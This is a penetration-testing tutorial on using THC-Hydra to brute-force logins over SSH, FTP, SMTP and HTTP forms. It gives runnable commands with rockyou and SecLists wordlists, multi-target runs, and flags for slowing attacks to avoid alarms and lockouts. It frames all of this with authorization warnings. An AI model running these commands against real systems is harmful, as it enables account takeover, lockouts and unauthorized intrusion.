THC-Hydra is one of the most widely used network login brute-force tools in penetration testing. It supports over 50 protocols — from SSH and FTP to HTTP forms and SMTP — making it a versatile weapon in an authorized attacker’s toolkit. This guide covers installation, core syntax, protocol-specific usage, and responsible practices.
Legal notice: Only use Hydra against systems you own or have explicit written authorization to test. Unauthorized brute-forcing is a criminal offense in most jurisdictions.
Installing Hydra
Hydra comes pre-installed on Kali Linux. For other systems:
# Debian/Ubuntu
sudo apt install hydra
# From source
git clone https://github.com/vanhauser-thc/thc-hydra
cd thc-hydra
./configure && make && make install
Verify installation:
hydra -h
Core Syntax
The basic structure of every Hydra command:
hydra [options] target protocol
The most important options:
| Flag | Purpose |
|---|
-l | Single username |
-L | Username list file |
-p | Single password |
-P | Password list file |
-t | Threads per target (default: 16) |
-W | Wait time between attempts (seconds) |
-s | Non-default port |
-v | Verbose mode |
-V | Very verbose (show each attempt) |
-o | Output results to file |
-f | Stop after first valid credential found |
Wordlists: rockyou.txt and Beyond
The legendary rockyou.txt wordlist — derived from a 2009 breach of 32 million RockYou passwords — is the default starting point for most password attacks:
# Location on Kali (may need to decompress first)
gunzip /usr/share/wordlists/rockyou.txt.gz
For targeted attacks, use SecLists:
sudo apt install seclists
ls /usr/share/seclists/Passwords/
Notable SecLists password files:
Common-Credentials/top-passwords-shortlist.txt — Quick winsLeaked-Databases/rockyou.txt — Classic full listDefault-Credentials/default-passwords.csv — Default creds for devices
SSH Brute-Forcing
SSH is a common target on internal networks and CTF boxes:
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
With a username list:
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
-P /usr/share/wordlists/rockyou.txt \
ssh://192.168.1.100 \
-t 4 -f -o ssh_results.txt
Important: Keep -t low for SSH (4–6 threads). SSH has built-in throttling and high thread counts cause connection failures. Some servers enforce fail2ban after 3–5 failed attempts — be aware of this in real engagements.
Web login forms are among the most common targets. Hydra needs three pieces of information:
- The form POST URL
- The POST body parameters
- A string that appears only on failed login
Use Burp Suite or browser developer tools (Network tab) to capture a failed login. You’ll see something like:
POST /login HTTP/1.1
Host: target.com
username=admin&password=wrong&submit=Login
Hydra HTTP-POST-FORM Syntax
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
target.com \
http-post-form "/login:username=^USER^&password=^PASS^&submit=Login:Invalid credentials"
The format for the module is: "/path:POST_body:failure_string"
^USER^ — Hydra replaces this with each username^PASS^ — Hydra replaces this with each password- The final segment is a string that appears in the response on failure
For HTTPS targets:
hydra -l admin -P rockyou.txt \
target.com \
https-post-form "/login:username=^USER^&password=^PASS^:Invalid"
Handling CSRF Tokens
Many modern apps use CSRF tokens. Hydra cannot automatically handle rotating CSRF tokens — for those, use Burp Suite’s Intruder with a macro to fetch a fresh token per request.
FTP Brute-Forcing
hydra -l ftp -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.100
With a custom port:
hydra -l admin -P rockyou.txt ftp://192.168.1.100 -s 2121
SMTP Brute-Forcing
Email server credential attacks:
hydra -l user@target.com -P rockyou.txt smtp://mail.target.com
For SMTP with STARTTLS:
hydra -l user@target.com -P rockyou.txt smtp-starttls://mail.target.com
Rate Limiting and Stealth Flags
High-speed brute-forcing triggers alarms and lockouts. Key flags for controlled attacks:
-t — Threads per target. Reducing this slows the attack:
hydra -l admin -P rockyou.txt ssh://target.com -t 2
-W — Wait time in seconds between each connection attempt:
hydra -l admin -P rockyou.txt ssh://target.com -W 3
-c — Time to wait per login attempt in seconds (overrides -W):
hydra -l admin -P rockyou.txt ssh://target.com -c 5
-f — Exit after the first found credential pair. Essential for efficiency:
hydra -L users.txt -P rockyou.txt ssh://target.com -f -o found.txt
Multiple Targets
Attack a list of targets simultaneously:
hydra -L users.txt -P rockyou.txt -M targets.txt ssh
The targets.txt file contains one IP or hostname per line.
Interpreting Output
A successful find looks like:
[22][ssh] host: 192.168.1.100 login: admin password: password123
Save results with -o:
hydra -l admin -P rockyou.txt ssh://192.168.1.100 -o hydra_output.txt
Responsible Use Guidelines
Hydra is a powerful tool that can cause real damage if misused:
- Always have written authorization before testing any system you don’t own
- Account lockout: Many systems lock accounts after 3–5 failed attempts, potentially causing denial-of-service for legitimate users. Check the engagement scope for lockout policies
- Rate limit deliberately: Slow attacks are less disruptive and less likely to trigger defenses
- Log your activity: Keep timestamps and notes of what you tested and when
- Report responsibly: If you find valid credentials, report them through proper channels immediately
Hydra is most effective against weak password policies and default credentials. In practice, combining it with a user enumeration step (finding valid usernames first) dramatically improves success rates. Pair Hydra with Medusa or Ncrack for cross-validation when thoroughness matters.